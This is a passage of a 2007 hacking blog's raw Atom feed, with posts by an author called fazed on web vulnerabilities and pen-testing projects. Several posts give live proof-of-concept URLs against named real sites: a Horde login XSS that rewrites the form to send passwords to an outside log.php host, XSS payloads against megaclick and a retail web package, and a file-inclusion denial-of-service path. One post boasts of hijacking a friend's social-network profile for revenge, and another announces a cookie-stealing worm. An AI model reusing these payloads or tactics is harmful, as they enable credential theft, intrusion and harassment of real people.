height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-2396098542682327167?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/2396098542682327167/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=2396098542682327167' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2396098542682327167'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2396098542682327167'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/code-for-logphp.html' title='Code for log.php'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-9135029688937531961</id><published>2007-10-09T02:00:00.000+01:00</published><updated>2007-10-09T02:02:01.851+01:00</updated><title type='text'>Nuked City?</title><content type='html'>I've just finished reading the&lt;br /&gt;white paper on the Axis 2100 research,&lt;br /&gt;I desided to do a google search for these&lt;br /&gt;camera's and i found the AXIS 221 network camera,&lt;br /&gt;it lets you set the image in a GET variable..&lt;br /&gt;&lt;br /&gt;here's what I mean:&lt;br /&gt;&lt;a href="http://216.70.11.13/view/view.shtml?imagePath=http%3A%2F%2Fwww.acceleratingfuture.com%2Fmichael%2Fblog%2Fimages%2FNuke2.JPG&amp;size=1"&gt;PoC&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-9135029688937531961?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/9135029688937531961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=9135029688937531961' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/9135029688937531961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/9135029688937531961'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/nuked-city.html' title='Nuked City?'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4194218574574667928</id><published>2007-10-07T20:28:00.000+01:00</published><updated>2007-10-07T20:35:01.979+01:00</updated><title type='text'>Horde v3.0.10 Password Logging</title><content type='html'>The Login system on horde v3.0.10 (maybe more I haven't tested)&lt;br /&gt;has an XSS that allows you to log the passwords entered by the&lt;br /&gt;users, who's going to suspect somethings wrong if its their site&lt;br /&gt;in the url and its showing them a familier login screen?&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;u&gt;&lt;a href="https://projectdream.org/horde/login.php?url=%22%3E%3Cscript%3Edocument.horde_login.action='http://ourwebportals.co.uk/log.php'%3C/script%3E"&gt;PoC&lt;/a&gt;&lt;/u&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4194218574574667928?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4194218574574667928/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4194218574574667928' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4194218574574667928'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4194218574574667928'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/horde-v3010-password-logging.html' title='Horde v3.0.10 Password Logging'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-110652636081155712</id><published>2007-10-07T18:39:00.000+01:00</published><updated>2007-10-07T18:44:53.817+01:00</updated><title type='text'>Response 300</title><content type='html'>Why? just why did the people who came up&lt;br /&gt;with response codes include 300?&lt;br /&gt;if you ever come across a server that actually&lt;br /&gt;allows this response then take advantage of it,&lt;br /&gt;for example if your looking for a file but don't&lt;br /&gt;know what extension the developer may have used&lt;br /&gt;then you could do something like this (say you were&lt;br /&gt;looking for sql.obfuscated but didn't know its extention)&lt;br /&gt;you could visit:&lt;br /&gt;http://example.com/sql.&lt;br /&gt;and it would give you a list of all files that start with sql,&lt;br /&gt;so it would show you sql.obfuscated, people turn this off!&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-110652636081155712?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/110652636081155712/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=110652636081155712' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/110652636081155712'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/110652636081155712'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/response-300.html' title='Response 300'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-6481025592875509805</id><published>2007-10-06T01:09:00.001+01:00</published><updated>2007-10-06T01:14:59.124+01:00</updated><title type='text'>Phishing Windows Passwords with Citrix</title><content type='html'>Ok this is only in theory at the moment&lt;br /&gt;but if you have ever set up the citrix presentation&lt;br /&gt;server client then you will see that they include an&lt;br /&gt;option to log into citrix servers using the current&lt;br /&gt;windows users username and password, now think about&lt;br /&gt;it. send the users password to a server?&lt;br /&gt;couldn't an attacker just set up a fake server and&lt;br /&gt;get people to attempt to login and store their password&lt;br /&gt;somewhere? anouther example of just how bad GUI security&lt;br /&gt;can be..&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-6481025592875509805?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/6481025592875509805/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=6481025592875509805' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6481025592875509805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6481025592875509805'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/phishing-windows-passwords-with-citrix.html' title='Phishing Windows Passwords with Citrix'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-490541325642965103</id><published>2007-09-29T18:15:00.001+01:00</published><updated>2007-09-30T18:03:18.437+01:00</updated><title type='text'>Intelligent Retail DoS</title><content type='html'>I don't usually post about DoS's or&lt;br /&gt;any PoC's or 0-days (which this is)&lt;br /&gt;but I know a business that uses this&lt;br /&gt;software for their website.&lt;br /&gt;this DoS needs to be run on serveral computers&lt;br /&gt;(so it is more of a DDoS)&lt;br /&gt;the DoS is in software created by Intelligent Retail&lt;br /&gt;who also offer cash registers for businesses.&lt;br /&gt;Anyway I took a quick look through a site&lt;br /&gt;for a friend, at first I thought "oh they use&lt;br /&gt;jsp there wont be many vulnerabilities" but then&lt;br /&gt;I found a local file inclusion which also works&lt;br /&gt;as a DoS tool in the file:&lt;br /&gt;&lt;blockquote&gt;host.jsp?pg=host.jsp&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;there is also an xss in this page:&lt;br /&gt;&lt;blockquote&gt;host.jsp?pg=aboutus.html&lt;br /&gt;&amp;desc='%3E%3Cscript%3Ealert('xss')%3C/script%3E&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;there are probably many other error's in this code&lt;br /&gt;these are just a few I came accross.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-490541325642965103?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/490541325642965103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=490541325642965103' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/490541325642965103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/490541325642965103'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/intelligent-retail-dos.html' title='Intelligent Retail DoS'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-8110295937292845485</id><published>2007-09-27T01:07:00.000+01:00</published><updated>2007-09-27T01:11:42.458+01:00</updated><title type='text'>google XSS fixed</title><content type='html'>the latest google xss seems to have been&lt;br /&gt;fixed, this xss could have caused so much&lt;br /&gt;damage during the time from discovery to&lt;br /&gt;being fixed. for example this exploit was&lt;br /&gt;on the mi5 (british seacret intelligence)&lt;br /&gt;website, some "leet" hacker could have stolen&lt;br /&gt;their admins cookies and taken down the uk,&lt;br /&gt;yeah right.&lt;br /&gt;but still this vulnerability effected so many&lt;br /&gt;sites and could have ment that script kiddies&lt;br /&gt;could have had easy pickings, from now on I&lt;br /&gt;think vulnerability's like this should have&lt;br /&gt;a more secret disclosure (I will probably end up&lt;br /&gt;going back on this later)&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-8110295937292845485?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/8110295937292845485/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=8110295937292845485' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8110295937292845485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/8110295937292845485'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/google-xss-fixed.html' title='google XSS fixed'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4708489184331466465</id><published>2007-09-26T23:42:00.000+01:00</published><updated>2007-09-27T00:27:41.540+01:00</updated><title type='text'>Javascript Worm</title><content type='html'>I will be spending some time&lt;br /&gt;during the comming months working&lt;br /&gt;on a javascript worm which&lt;br /&gt;will use common vulnerabilities&lt;br /&gt;to get its way into a victims system&lt;br /&gt;and stay there, learning more vulnerabilities&lt;br /&gt;and using AJAX to make calls behind the victims&lt;br /&gt;browser to send their cookies and so on,&lt;br /&gt;this could take some time to write so&lt;br /&gt;don't expect it soon.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4708489184331466465?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4708489184331466465/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4708489184331466465' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4708489184331466465'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4708489184331466465'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/javascript-worm.html' title='Javascript Worm'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4182323994271554589</id><published>2007-09-26T23:36:00.000+01:00</published><updated>2007-09-26T23:41:38.247+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='offtopic'/><title type='text'>Online Shameing</title><content type='html'>Well today I have actually realised&lt;br /&gt;how much the internet means to people&lt;br /&gt;and their social lives these days,&lt;br /&gt;for example at one point one of&lt;br /&gt;my friends spread stuff about me&lt;br /&gt;and made my girlfriend at the time&lt;br /&gt;annoyed with me, I wanted to get&lt;br /&gt;back at him some how without him&lt;br /&gt;knowing it was me, so what did i do?&lt;br /&gt;I concocted a simple social engineering&lt;br /&gt;page for the (second most) popular social&lt;br /&gt;network in the uk, bebo. I then told&lt;br /&gt;my mate to say "omg look at what [name blanked]&lt;br /&gt;has written on his bebo" and the stupid guy&lt;br /&gt;actually fell for it.&lt;br /&gt;&lt;br /&gt;anyway I changed his bebo abit and he was really&lt;br /&gt;angry because everyone was laughing at him,&lt;br /&gt;this just shows to me that people are depending&lt;br /&gt;on the internet for their social life too much.&lt;br /&gt;&lt;br /&gt;(wow that post was a tad of topic)&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4182323994271554589?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4182323994271554589/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4182323994271554589' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4182323994271554589'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4182323994271554589'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/online-shameing.html' title='Online Shameing'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-5551648684321810901</id><published>2007-09-26T23:33:00.000+01:00</published><updated>2007-09-26T23:36:07.669+01:00</updated><title type='text'>"1337" web browsers</title><content type='html'>well 7 year old kids have taken to&lt;br /&gt;the forms as proven by the recent posts&lt;br /&gt;on the popular place for noobies to&lt;br /&gt;hang out http://4chan.org&lt;br /&gt;&lt;br /&gt;Don't worry this isn't my only post tonight&lt;br /&gt;I just wanted to mention it,&lt;br /&gt;and shame some noob called sage!&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-5551648684321810901?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/5551648684321810901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=5551648684321810901' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5551648684321810901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5551648684321810901'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/1337-web-browsers.html' title='&quot;1337&quot; web browsers'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-3591890136073490318</id><published>2007-09-20T16:12:00.000+01:00</published><updated>2007-09-20T16:18:06.403+01:00</updated><title type='text'>XSS in megaclick</title><content type='html'>I downloaded the megaupload toolbar&lt;br /&gt;the other day because I thought it would&lt;br /&gt;make uploading things much quicker.&lt;br /&gt;but I've started noticing that every time&lt;br /&gt;I get an error code I get taken to megaclick&lt;br /&gt;to view it instead, I started to get VERY annoyed&lt;br /&gt;with this so i looked closer, and guess what..&lt;br /&gt;an XSS!&lt;br /&gt;the below is &lt;span style="font-weight:bold;"&gt;ONE&lt;/span&gt; url&lt;br /&gt;put it together and see what you get:&lt;br /&gt;&lt;blockquote&gt;http://www.megaclick.com/404/?lg=en&amp;type=44&amp;q=&lt;br /&gt;http://www.google.co.uk/erwef%3Cscript%3Ealert&lt;br /&gt;(String.fromCharCode(120%20,115%20,115%20))%3C/script%3E&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-3591890136073490318?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/3591890136073490318/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=3591890136073490318' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3591890136073490318'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3591890136073490318'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/xss-in-megaclick.html' title='XSS in megaclick'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-2344222736614177921</id><published>2007-09-20T01:25:00.001+01:00</published><updated>2007-09-20T01:26:55.209+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='video'/><title type='text'>[VID] Remote Code Injection</title><content type='html'>&lt;object width="289" height="244"&gt;&lt;param name="movie" value="http://www.megavideo.com/v/ERUMUIJL806d24696760e5178646645f94cfc291.3809313804.4"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.megavideo.com/v/ERUMUIJL806d24696760e5178646645f94cfc291.3809313804.4" type="application/x-shockwave-flash" wmode="transparent" width="289" height="244"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-2344222736614177921?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/2344222736614177921/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=2344222736614177921' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2344222736614177921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/2344222736614177921'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/vid-remote-code-injection.html' title='[VID] Remote Code Injection'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-755006693494814430</id><published>2007-09-19T23:51:00.000+01:00</published><updated>2007-09-19T23:54:37.826+01:00</updated><title type='text'>Videos</title><content type='html'>I am creating a series of videos&lt;br /&gt;to go in my pen-testing tutorial collection&lt;br /&gt;that I am writing, I will attempt to&lt;br /&gt;create a video for each type of common&lt;br /&gt;attack at the moment as well as a few&lt;br /&gt;other tricks, You will be able to view these&lt;br /&gt;video's for free (at the moment) at:&lt;br /&gt;http://megavideo.com/?c=profile_videos&amp;user=fazed666&lt;br /&gt;&lt;br /&gt;although I will be posting some on here from&lt;br /&gt;time to time.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-755006693494814430?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/755006693494814430/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=755006693494814430' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/755006693494814430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/755006693494814430'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/videos.html' title='Videos'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-6900137653185944793</id><published>2007-09-19T23:44:00.000+01:00</published><updated>2007-09-19T23:50:42.160+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='IDS'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>OWP IDS</title><content type='html'>I am currently working on a project for&lt;br /&gt;a client, this is just a simple business&lt;br /&gt;web portal but as we are marketing it we&lt;br /&gt;want something that will make it stand out&lt;br /&gt;and instead of just making sure my script's&lt;br /&gt;were secure and pen-testing an example site&lt;br /&gt;after I created it I have created a whole&lt;br /&gt;IDS written in php, this IDS can be updated&lt;br /&gt;with new rules as much as the user wants and&lt;br /&gt;will check all GET and POST request for anything&lt;br /&gt;malicious and log the input to file, this will&lt;br /&gt;make it easier for an admin to see if there have&lt;br /&gt;been any attempted break in's or to see the entry&lt;br /&gt;point if there were any real break in's,&lt;br /&gt;&lt;br /&gt;the source code for this IDS will be realeased after&lt;br /&gt;release 2.0 of the web portal as it is commercial software&lt;br /&gt;that I am selling at the moment,&lt;br /&gt;If you cant wait you can contact me at:&lt;br /&gt;team [at] net [dash] aware [dot] co [dot] uk&lt;br /&gt;and I will sell it to anyone for a discount price.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-6900137653185944793?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/6900137653185944793/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=6900137653185944793' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6900137653185944793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/6900137653185944793'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/owp-ids.html' title='OWP IDS'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4945123379083967189</id><published>2007-09-12T01:28:00.000+01:00</published><updated>2007-09-12T01:30:41.747+01:00</updated><title type='text'>My ChickenFoot Javascript Scanner</title><content type='html'>I have been working on a chickenfoot/javascript app&lt;br /&gt;which will scan the website you are on for&lt;br /&gt;vulnerabilities, at the moment it is very basic&lt;br /&gt;but I am planning to add a spider that will&lt;br /&gt;find all the pages on the current site and&lt;br /&gt;test each one. chickenfoot allowes for local&lt;br /&gt;storage so this is possible.&lt;br /&gt;I will keep you posted on it.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4945123379083967189?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4945123379083967189/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4945123379083967189' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4945123379083967189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4945123379083967189'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/09/my-chickenfoot-javascript-scanner.html' title='My ChickenFoot Javascript Scanner'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 